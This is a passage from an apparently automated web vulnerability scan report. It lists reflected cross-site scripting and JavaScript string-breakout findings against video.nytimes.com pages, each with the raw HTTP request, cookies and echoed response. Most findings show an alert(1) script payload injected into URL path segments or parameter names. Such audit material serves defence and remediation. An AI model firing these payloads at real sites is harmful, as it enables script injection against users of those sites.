Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/2010/10/22/dining55c34'%3b002fe85984d/1248068993538/ricotta-cheese-gnocchi.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:19:11 GMT
Content-type: text/html
Content-Length: 249537

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
%20traditional%20potatoes.');
}
function getShareKeywords() {
return( '' );
}
function getShareSection() {
return( 'Video%20Library' );
}
function getShareSectionDisplay() {
return( 'dining55c34';002fe85984d' );
}
function getShareSubSection() {
return( '' );
}
function getShareByline() { //artist is specific to slide - should actually relate to entire show
return getTitleItem('auth', decodeURICom
...[SNIP]...

3.309. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://video.nytimes.com
Path:   /video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79b31"%3bcafe286b57b was submitted in the REST URL parameter 5. This input was echoed as 79b31";cafe286b57b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/2010/10/22/dining79b31"%3bcafe286b57b/1248068993538/ricotta-cheese-gnocchi.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:18:29 GMT
Content-type: text/html
Content-Length: 249520

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="text/javascript">
var user_type = "0";
var s_prop20 = "";
var s_account = "nytimesglobal,nytdining79b31";cafe286b57b";
var dcsvid = "";
var regstatus = "non-registered";
var s_channel = "dining79b31";cafe286b57b";
var s_prop2 = "";
var s_prop1 = "multimedia";
</script>
...[SNIP]...

3.310. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a464"><script>alert(1)</script>b2ef5312de8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html?5a464"><script>alert(1)</script>b2ef5312de8=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:15:00 GMT
Content-type: text/html
Content-Length: 249502

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html?5a464"><script>alert(1)</script>b2ef5312de8=1">
...[SNIP]...

3.311. http://video.nytimes.com/video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f81a2"><script>alert(1)</script>e5ec6d199e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010f81a2"><script>alert(1)</script>e5ec6d199e6/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:16:29 GMT
Content-type: text/html
Content-Length: 233680

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010f81a2"><script>alert(1)</script>e5ec6d199e6/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html">
...[SNIP]...

3.312. http://video.nytimes.com/video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 770bc"><script>alert(1)</script>c07a57170dd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10770bc"><script>alert(1)</script>c07a57170dd/22/nyregion/1248069217296/city-critic-patrolling-the-city.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:16:38 GMT
Content-type: text/html
Content-Length: 233680

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10770bc"><script>alert(1)</script>c07a57170dd/22/nyregion/1248069217296/city-critic-patrolling-the-city.html">
...[SNIP]...

3.313. http://video.nytimes.com/video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19302"><script>alert(1)</script>522222ec894 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html?19302"><script>alert(1)</script>522222ec894=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:14:00 GMT
Content-type: text/html
Content-Length: 238727

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html?19302"><script>alert(1)</script>522222ec894=1">
...[SNIP]...

3.314. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f6aa"><script>alert(1)</script>65a3cb3cced was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/20108f6aa"><script>alert(1)</script>65a3cb3cced/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:16:00 GMT
Content-type: text/html
Content-Length: 233687

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/20108f6aa"><script>alert(1)</script>65a3cb3cced/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html">
...[SNIP]...

3.315. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d322"><script>alert(1)</script>99d3d3da6ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/109d322"><script>alert(1)</script>99d3d3da6ca/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:16:20 GMT
Content-type: text/html
Content-Length: 233686

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/109d322"><script>alert(1)</script>99d3d3da6ca/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html">
...[SNIP]...

3.316. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f415d"><script>alert(1)</script>f8c9aac263e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/23f415d"><script>alert(1)</script>f8c9aac263e/world/asia/1248069229316/chinas-new-wave-music-festivals.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:16:40 GMT
Content-type: text/html
Content-Length: 233686

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/23f415d"><script>alert(1)</script>f8c9aac263e/world/asia/1248069229316/chinas-new-wave-music-festivals.html">
...[SNIP]...

3.317. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37464"><script>alert(1)</script>84aa575cb62 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/23/world37464"><script>alert(1)</script>84aa575cb62/asia/1248069229316/chinas-new-wave-music-festivals.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:17:11 GMT
Content-type: text/html
Content-Length: 233687

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/23/world37464"><script>alert(1)</script>84aa575cb62/asia/1248069229316/chinas-new-wave-music-festivals.html">
...[SNIP]...

3.318. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://video.nytimes.com
Path:   /video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96257'%3be85a1e8f6a1 was submitted in the REST URL parameter 5. This input was echoed as 96257';e85a1e8f6a1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/2010/10/23/world96257'%3be85a1e8f6a1/asia/1248069229316/chinas-new-wave-music-festivals.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:18:09 GMT
Content-type: text/html
Content-Length: 242027

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
ul%20hipness%20to%20cities.');
}
function getShareKeywords() {
return( '' );
}
function getShareSection() {
return( 'Video%20Library' );
}
function getShareSectionDisplay() {
return( 'world96257';e85a1e8f6a1' );
}
function getShareSubSection() {
return( 'asia' );
}
function getShareByline() { //artist is specific to slide - should actually relate to entire show
return getTitleItem('auth', decodeUR
...[SNIP]...

3.319. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://video.nytimes.com
Path:   /video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e929"%3bc83276095a3 was submitted in the REST URL parameter 5. This input was echoed as 4e929";c83276095a3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/2010/10/23/world4e929"%3bc83276095a3/asia/1248069229316/chinas-new-wave-music-festivals.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:17:24 GMT
Content-type: text/html
Content-Length: 242027

